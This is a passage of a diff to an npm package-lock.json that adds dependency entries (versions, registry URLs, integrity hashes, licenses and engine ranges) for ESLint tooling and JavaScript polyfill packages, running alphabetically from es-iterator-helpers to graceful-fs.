"https://registry.npmjs.org/es-iterator-helpers/-/es-iterator-helpers-1.3.2.tgz", + "integrity": "sha512-HVLACW1TppGYjJ8H6/jqH/pqOtKRw6wMlrB23xfExmFWxFquAIWCmwoLsOyN96K4a5KbmOf5At9ZUO3GZbetAw==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.9", + "call-bound": "^1.0.4", + "define-properties": "^1.2.1", + "es-abstract": "^1.24.2", + "es-errors": "^1.3.0", + "es-set-tostringtag": "^2.1.0", + "function-bind": "^1.1.2", + "get-intrinsic": "^1.3.0", + "globalthis": "^1.0.4", + "gopd": "^1.2.0", + "has-property-descriptors": "^1.0.2", + "has-proto": "^1.2.0", + "has-symbols": "^1.1.0", + "internal-slot": "^1.1.0", + "iterator.prototype": "^1.1.5", + "math-intrinsics": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-set-tostringtag": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-shim-unscopables": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/es-shim-unscopables/-/es-shim-unscopables-1.1.0.tgz", + "integrity": "sha512-d9T8ucsEhh8Bi1woXCf+TIKDIROLG5WCkxg8geBCbvk22kzwC5G2OnXVMO6FUsvQlgUUXQ2itephWDLqDzbeCw==", + "dev": true, + "license": "MIT", + "dependencies": { + "hasown": "^2.0.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-to-primitive": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-to-primitive/-/es-to-primitive-1.3.0.tgz", + "integrity": "sha512-w+5mJ3GuFL+NjVtJlvydShqE1eN3h3PbI7/5LAsYJP/2qtuMXjfL2LpHSRqo4b4eSF5K/DH1JXKUAHSB2UW50g==", + "dev": true, + "license": "MIT", + "dependencies": { + "is-callable": "^1.2.7", + "is-date-object": "^1.0.5", + "is-symbol": "^1.0.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/escape-string-regexp": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", + "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/eslint": { + "version": "9.39.4", + "resolved": "https://registry.npmjs.org/eslint/-/eslint-9.39.4.tgz", + "integrity": "sha512-XoMjdBOwe/esVgEvLmNsD3IRHkm7fbKIUGvrleloJXUZgDHig2IPWNniv+GwjyJXzuNqVjlr5+4yVUZjycJwfQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@eslint-community/eslint-utils": "^4.8.0", + "@eslint-community/regexpp": "^4.12.1", + "@eslint/config-array": "^0.21.2", + "@eslint/config-helpers": "^0.4.2", + "@eslint/core": "^0.17.0", + "@eslint/eslintrc": "^3.3.5", + "@eslint/js": "9.39.4", + "@eslint/plugin-kit": "^0.4.1", + "@humanfs/node": "^0.16.6", + "@humanwhocodes/module-importer": "^1.0.1", + "@humanwhocodes/retry": "^0.4.2", + "@types/estree": "^1.0.6", + "ajv": "^6.14.0", + "chalk": "^4.0.0", + "cross-spawn": "^7.0.6", + "debug": "^4.3.2", + "escape-string-regexp": "^4.0.0", + "eslint-scope": "^8.4.0", + "eslint-visitor-keys": "^4.2.1", + "espree": "^10.4.0", + "esquery": "^1.5.0", + "esutils": "^2.0.2", + "fast-deep-equal": "^3.1.3", + "file-entry-cache": "^8.0.0", + "find-up": "^5.0.0", + "glob-parent": "^6.0.2", + "ignore": "^5.2.0", + "imurmurhash": "^0.1.4", + "is-glob": "^4.0.0", + "json-stable-stringify-without-jsonify": "^1.0.1", + "lodash.merge": "^4.6.2", + "minimatch": "^3.1.5", + "natural-compare": "^1.4.0", + "optionator": "^0.9.3" + }, + "bin": { + "eslint": "bin/eslint.js" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "url": "https://eslint.org/donate" + }, + "peerDependencies": { + "jiti": "*" + }, + "peerDependenciesMeta": { + "jiti": { + "optional": true + } + } + }, + "node_modules/eslint-config-next": { + "version": "15.5.15", + "resolved": "https://registry.npmjs.org/eslint-config-next/-/eslint-config-next-15.5.15.tgz", + "integrity": "sha512-mI5KIONOIosjF3jK2z9a8fY2LePNeW5C4lRJ+XZoJHAKkwx2MQjMPQ2/kL7tsMRPcQPZc/UBtCfqxElluL1CBg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@next/eslint-plugin-next": "15.5.15", + "@rushstack/eslint-patch": "^1.10.3", + "@typescript-eslint/eslint-plugin": "^5.4.2 || ^6.0.0 || ^7.0.0 || ^8.0.0", + "@typescript-eslint/parser": "^5.4.2 || ^6.0.0 || ^7.0.0 || ^8.0.0", + "eslint-import-resolver-node": "^0.3.6", + "eslint-import-resolver-typescript": "^3.5.2", + "eslint-plugin-import": "^2.31.0", + "eslint-plugin-jsx-a11y": "^6.10.0", + "eslint-plugin-react": "^7.37.0", + "eslint-plugin-react-hooks": "^5.0.0" + }, + "peerDependencies": { + "eslint": "^7.23.0 || ^8.0.0 || ^9.0.0", + "typescript": ">=3.3.1" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/eslint-import-resolver-node": { + "version": "0.3.10", + "resolved": "https://registry.npmjs.org/eslint-import-resolver-node/-/eslint-import-resolver-node-0.3.10.tgz", + "integrity": "sha512-tRrKqFyCaKict5hOd244sL6EQFNycnMQnBe+j8uqGNXYzsImGbGUU4ibtoaBmv5FLwJwcFJNeg1GeVjQfbMrDQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "debug": "^3.2.7", + "is-core-module": "^2.16.1", + "resolve": "^2.0.0-next.6" + } + }, + "node_modules/eslint-import-resolver-node/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/eslint-import-resolver-typescript": { + "version": "3.10.1", + "resolved": "https://registry.npmjs.org/eslint-import-resolver-typescript/-/eslint-import-resolver-typescript-3.10.1.tgz", + "integrity": "sha512-A1rHYb06zjMGAxdLSkN2fXPBwuSaQ0iO5M/hdyS0Ajj1VBaRp0sPD3dn1FhME3c/JluGFbwSxyCfqdSbtQLAHQ==", + "dev": true, + "license": "ISC", + "dependencies": { + "@nolyfill/is-core-module": "1.0.39", + "debug": "^4.4.0", + "get-tsconfig": "^4.10.0", + "is-bun-module": "^2.0.0", + "stable-hash": "^0.0.5", + "tinyglobby": "^0.2.13", + "unrs-resolver": "^1.6.2" + }, + "engines": { + "node": "^14.18.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint-import-resolver-typescript" + }, + "peerDependencies": { + "eslint": "*", + "eslint-plugin-import": "*", + "eslint-plugin-import-x": "*" + }, + "peerDependenciesMeta": { + "eslint-plugin-import": { + "optional": true + }, + "eslint-plugin-import-x": { + "optional": true + } + } + }, + "node_modules/eslint-module-utils": { + "version": "2.12.1", + "resolved": "https://registry.npmjs.org/eslint-module-utils/-/eslint-module-utils-2.12.1.tgz", + "integrity": "sha512-L8jSWTze7K2mTg0vos/RuLRS5soomksDPoJLXIslC7c8Wmut3bx7CPpJijDcBZtxQ5lrbUdM+s0OlNbz0DCDNw==", + "dev": true, + "license": "MIT", + "dependencies": { + "debug": "^3.2.7" + }, + "engines": { + "node": ">=4" + }, + "peerDependenciesMeta": { + "eslint": { + "optional": true + } + } + }, + "node_modules/eslint-module-utils/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/eslint-plugin-import": { + "version": "2.32.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-import/-/eslint-plugin-import-2.32.0.tgz", + "integrity": "sha512-whOE1HFo/qJDyX4SnXzP4N6zOWn79WhnCUY/iDR0mPfQZO8wcYE4JClzI2oZrhBnnMUCBCHZhO6VQyoBU95mZA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@rtsao/scc": "^1.1.0", + "array-includes": "^3.1.9", + "array.prototype.findlastindex": "^1.2.6", + "array.prototype.flat": "^1.3.3", + "array.prototype.flatmap": "^1.3.3", + "debug": "^3.2.7", + "doctrine": "^2.1.0", + "eslint-import-resolver-node": "^0.3.9", + "eslint-module-utils": "^2.12.1", + "hasown": "^2.0.2", + "is-core-module": "^2.16.1", + "is-glob": "^4.0.3", + "minimatch": "^3.1.2", + "object.fromentries": "^2.0.8", + "object.groupby": "^1.0.3", + "object.values": "^1.2.1", + "semver": "^6.3.1", + "string.prototype.trimend": "^1.0.9", + "tsconfig-paths": "^3.15.0" + }, + "engines": { + "node": ">=4" + }, + "peerDependencies": { + "eslint": "^2 || ^3 || ^4 || ^5 || ^6 || ^7.2.0 || ^8 || ^9" + } + }, + "node_modules/eslint-plugin-import/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/eslint-plugin-import/node_modules/semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + } + }, + "node_modules/eslint-plugin-jsx-a11y": { + "version": "6.10.2", + "resolved": "https://registry.npmjs.org/eslint-plugin-jsx-a11y/-/eslint-plugin-jsx-a11y-6.10.2.tgz", + "integrity": "sha512-scB3nz4WmG75pV8+3eRUQOHZlNSUhFNq37xnpgRkCCELU3XMvXAxLk1eqWWyE22Ki4Q01Fnsw9BA3cJHDPgn2Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "aria-query": "^5.3.2", + "array-includes": "^3.1.8", + "array.prototype.flatmap": "^1.3.2", + "ast-types-flow": "^0.0.8", + "axe-core": "^4.10.0", + "axobject-query": "^4.1.0", + "damerau-levenshtein": "^1.0.8", + "emoji-regex": "^9.2.2", + "hasown": "^2.0.2", + "jsx-ast-utils": "^3.3.5", + "language-tags": "^1.0.9", + "minimatch": "^3.1.2", + "object.fromentries": "^2.0.8", + "safe-regex-test": "^1.0.3", + "string.prototype.includes": "^2.0.1" + }, + "engines": { + "node": ">=4.0" + }, + "peerDependencies": { + "eslint": "^3 || ^4 || ^5 || ^6 || ^7 || ^8 || ^9" + } + }, + "node_modules/eslint-plugin-react": { + "version": "7.37.5", + "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.37.5.tgz", + "integrity": "sha512-Qteup0SqU15kdocexFNAJMvCJEfa2xUKNV4CC1xsVMrIIqEy3SQ/rqyxCWNzfrd3/ldy6HMlD2e0JDVpDg2qIA==", + "dev": true, + "license": "MIT", + "dependencies": { + "array-includes": "^3.1.8", + "array.prototype.findlast": "^1.2.5", + "array.prototype.flatmap": "^1.3.3", + "array.prototype.tosorted": "^1.1.4", + "doctrine": "^2.1.0", + "es-iterator-helpers": "^1.2.1", + "estraverse": "^5.3.0", + "hasown": "^2.0.2", + "jsx-ast-utils": "^2.4.1 || ^3.0.0", + "minimatch": "^3.1.2", + "object.entries": "^1.1.9", + "object.fromentries": "^2.0.8", + "object.values": "^1.2.1", + "prop-types": "^15.8.1", + "resolve": "^2.0.0-next.5", + "semver": "^6.3.1", + "string.prototype.matchall": "^4.0.12", + "string.prototype.repeat": "^1.0.0" + }, + "engines": { + "node": ">=4" + }, + "peerDependencies": { + "eslint": "^3 || ^4 || ^5 || ^6 || ^7 || ^8 || ^9.7" + } + }, + "node_modules/eslint-plugin-react-hooks": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-react-hooks/-/eslint-plugin-react-hooks-5.2.0.tgz", + "integrity": "sha512-+f15FfK64YQwZdJNELETdn5ibXEUQmW1DZL6KXhNnc2heoy/sg9VJJeT7n8TlMWouzWqSWavFkIhHyIbIAEapg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10" + }, + "peerDependencies": { + "eslint": "^3.0.0 || ^4.0.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 || ^8.0.0-0 || ^9.0.0" + } + }, + "node_modules/eslint-plugin-react/node_modules/semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + } + }, + "node_modules/eslint-scope": { + "version": "8.4.0", + "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-8.4.0.tgz", + "integrity": "sha512-sNXOfKCn74rt8RICKMvJS7XKV/Xk9kA7DyJr8mJik3S7Cwgy3qlkkmyS2uQB3jiJg6VNdZd/pDBJu0nvG2NlTg==", + "dev": true, + "license": "BSD-2-Clause", + "dependencies": { + "esrecurse": "^4.3.0", + "estraverse": "^5.2.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/eslint-visitor-keys": { + "version": "4.2.1", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-4.2.1.tgz", + "integrity": "sha512-Uhdk5sfqcee/9H/rCOJikYz67o0a2Tw2hGRPOG2Y1R2dg7brRe1uG0yaNQDHu+TO/uQPF/5eCapvYSmHUjt7JQ==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/espree": { + "version": "10.4.0", + "resolved": "https://registry.npmjs.org/espree/-/espree-10.4.0.tgz", + "integrity": "sha512-j6PAQ2uUr79PZhBjP5C5fhl8e39FmRnOjsD5lGnWrFU8i2G776tBK7+nP8KuQUTTyAZUwfQqXAgrVH5MbH9CYQ==", + "dev": true, + "license": "BSD-2-Clause", + "dependencies": { + "acorn": "^8.15.0", + "acorn-jsx": "^5.3.2", + "eslint-visitor-keys": "^4.2.1" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/esquery": { + "version": "1.7.0", + "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.7.0.tgz", + "integrity": "sha512-Ap6G0WQwcU/LHsvLwON1fAQX9Zp0A2Y6Y/cJBl9r/JbW90Zyg4/zbG6zzKa2OTALELarYHmKu0GhpM5EO+7T0g==", + "dev": true, + "license": "BSD-3-Clause", + "dependencies": { + "estraverse": "^5.1.0" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/esrecurse": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/esrecurse/-/esrecurse-4.3.0.tgz", + "integrity": "sha512-KmfKL3b6G+RXvP8N1vr3Tq1kL/oCFgn2NYXEtqP8/L3pKapUA4G8cFVaoF3SU323CD4XypR/ffioHmkti6/Tag==", + "dev": true, + "license": "BSD-2-Clause", + "dependencies": { + "estraverse": "^5.2.0" + }, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/estraverse": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.3.0.tgz", + "integrity": "sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==", + "dev": true, + "license": "BSD-2-Clause", + "engines": { + "node": ">=4.0" + } + }, + "node_modules/esutils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", + "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==", + "dev": true, + "license": "BSD-2-Clause", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/fast-deep-equal": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", + "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", + "dev": true, + "license": "MIT" + }, + "node_modules/fast-glob": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/fast-glob/-/fast-glob-3.3.1.tgz", + "integrity": "sha512-kNFPyjhh5cKjrUltxs+wFx+ZkbRaxxmZ+X0ZU31SOsxCEtP9VPgtq2teZw1DebupL5GmDaNQ6yKMMVcM41iqDg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@nodelib/fs.stat": "^2.0.2", + "@nodelib/fs.walk": "^1.2.3", + "glob-parent": "^5.1.2", + "merge2": "^1.3.0", + "micromatch": "^4.0.4" + }, + "engines": { + "node": ">=8.6.0" + } + }, + "node_modules/fast-glob/node_modules/glob-parent": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz", + "integrity": "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==", + "dev": true, + "license": "ISC", + "dependencies": { + "is-glob": "^4.0.1" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/fast-json-stable-stringify": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", + "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", + "dev": true, + "license": "MIT" + }, + "node_modules/fast-levenshtein": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", + "integrity": "sha512-DCXu6Ifhqcks7TZKY3Hxp3y6qphY5SJZmrWMDrKcERSOXWQdMhU9Ig/PYrzyw/ul9jOIyh0N4M0tbC5hodg8dw==", + "dev": true, + "license": "MIT" + }, + "node_modules/fastq": { + "version": "1.20.1", + "resolved": "https://registry.npmjs.org/fastq/-/fastq-1.20.1.tgz", + "integrity": "sha512-GGToxJ/w1x32s/D2EKND7kTil4n8OVk/9mycTc4VDza13lOvpUZTGX3mFSCtV9ksdGBVzvsyAVLM6mHFThxXxw==", + "dev": true, + "license": "ISC", + "dependencies": { + "reusify": "^1.0.4" + } + }, + "node_modules/file-entry-cache": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-8.0.0.tgz", + "integrity": "sha512-XXTUwCvisa5oacNGRP9SfNtYBNAMi+RPwBFmblZEF7N7swHYQS6/Zfk7SRwx4D5j3CH211YNRco1DEMNVfZCnQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "flat-cache": "^4.0.0" + }, + "engines": { + "node": ">=16.0.0" + } + }, + "node_modules/fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", + "dev": true, + "license": "MIT", + "dependencies": { + "to-regex-range": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/find-up": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-5.0.0.tgz", + "integrity": "sha512-78/PXT1wlLLDgTzDs7sjq9hzz0vXD+zn+7wypEe4fXQxCmdmqfGsEPQxmiCSQI3ajFV91bVSsvNtrJRiW6nGng==", + "dev": true, + "license": "MIT", + "dependencies": { + "locate-path": "^6.0.0", + "path-exists": "^4.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/flat-cache": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-4.0.1.tgz", + "integrity": "sha512-f7ccFPK3SXFHpx15UIGyRJ/FJQctuKZ0zVuN3frBo4HnK3cay9VEW0R6yPYFHC0AgqhukPzKjq22t5DmAyqGyw==", + "dev": true, + "license": "MIT", + "dependencies": { + "flatted": "^3.2.9", + "keyv": "^4.5.4" + }, + "engines": { + "node": ">=16" + } + }, + "node_modules/flatted": { + "version": "3.4.2", + "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.4.2.tgz", + "integrity": "sha512-PjDse7RzhcPkIJwy5t7KPWQSZ9cAbzQXcafsetQoD7sOJRQlGikNbx7yZp2OotDnJyrDcbyRq3Ttb18iYOqkxA==", + "dev": true, + "license": "ISC" + }, + "node_modules/for-each": { + "version": "0.3.5", + "resolved": "https://registry.npmjs.org/for-each/-/for-each-0.3.5.tgz", + "integrity": "sha512-dKx12eRCVIzqCxFGplyFKJMPvLEWgmNtUrpTiJIR5u97zEhRG8ySrtboPHZXx7daLxQVrl643cTzbab2tkQjxg==", + "dev": true, + "license": "MIT", + "dependencies": { + "is-callable": "^1.2.7" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "dev": true, + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/function.prototype.name": { + "version": "1.1.8", + "resolved": "https://registry.npmjs.org/function.prototype.name/-/function.prototype.name-1.1.8.tgz", + "integrity": "sha512-e5iwyodOHhbMr/yNrc7fDYG4qlbIvI5gajyzPnb5TCwyhjApznQh1BMFou9b30SevY43gCJKXycoCBjMbsuW0Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "call-bound": "^1.0.3", + "define-properties": "^1.2.1", + "functions-have-names": "^1.2.3", + "hasown": "^2.0.2", + "is-callable": "^1.2.7" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/functions-have-names": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/functions-have-names/-/functions-have-names-1.2.3.tgz", + "integrity": "sha512-xckBUXyTIqT97tq2x2AMb+g163b5JFysYk0x4qxNFwbfQkmNZoiRHb6sPzI9/QV33WeuvVYBUIiD4NzNIyqaRQ==", + "dev": true, + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/generator-function": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/generator-function/-/generator-function-2.0.1.tgz", + "integrity": "sha512-SFdFmIJi+ybC0vjlHN0ZGVGHc3lgE0DxPAT0djjVg+kjOnSqclqmj0KQ7ykTOLP6YxoqOvuAODGdcHJn+43q3g==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "dev": true, + "license": "MIT", + "dependencies": { + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/get-symbol-description": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/get-symbol-description/-/get-symbol-description-1.1.0.tgz", + "integrity": "sha512-w9UMqWwJxHNOvoNzSJ2oPF5wvYcvP7jUvYzhp67yEhTi17ZDBBC1z9pTdGuzjD+EFIqLSYRweZjqfiPzQ06Ebg==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.3", + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/get-tsconfig": { + "version": "4.14.0", + "resolved": "https://registry.npmjs.org/get-tsconfig/-/get-tsconfig-4.14.0.tgz", + "integrity": "sha512-yTb+8DXzDREzgvYmh6s9vHsSVCHeC0G3PI5bEXNBHtmshPnO+S5O7qgLEOn0I5QvMy6kpZN8K1NKGyilLb93wA==", + "dev": true, + "license": "MIT", + "dependencies": { + "resolve-pkg-maps": "^1.0.0" + }, + "funding": { + "url": "https://github.com/privatenumber/get-tsconfig?sponsor=1" + } + }, + "node_modules/glob-parent": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", + "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", + "dev": true, + "license": "ISC", + "dependencies": { + "is-glob": "^4.0.3" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/globals": { + "version": "14.0.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-14.0.0.tgz", + "integrity": "sha512-oahGvuMGQlPw/ivIYBjVSrWAfWLBeku5tpPE2fOPLi+WHffIWbuh2tCjhyQhTBPMf5E9jDEH4FOmTYgYwbKwtQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/globalthis": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/globalthis/-/globalthis-1.0.4.tgz", + "integrity": "sha512-DpLKbNU4WylpxJykQujfCcwYWiV/Jhm50Goo0wrVILAv5jOr9d+H+UR3PhSCD2rCCEIg0uc+G+muBTwD54JhDQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "define-properties": "^1.2.1", + "gopd": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/graceful-fs": { 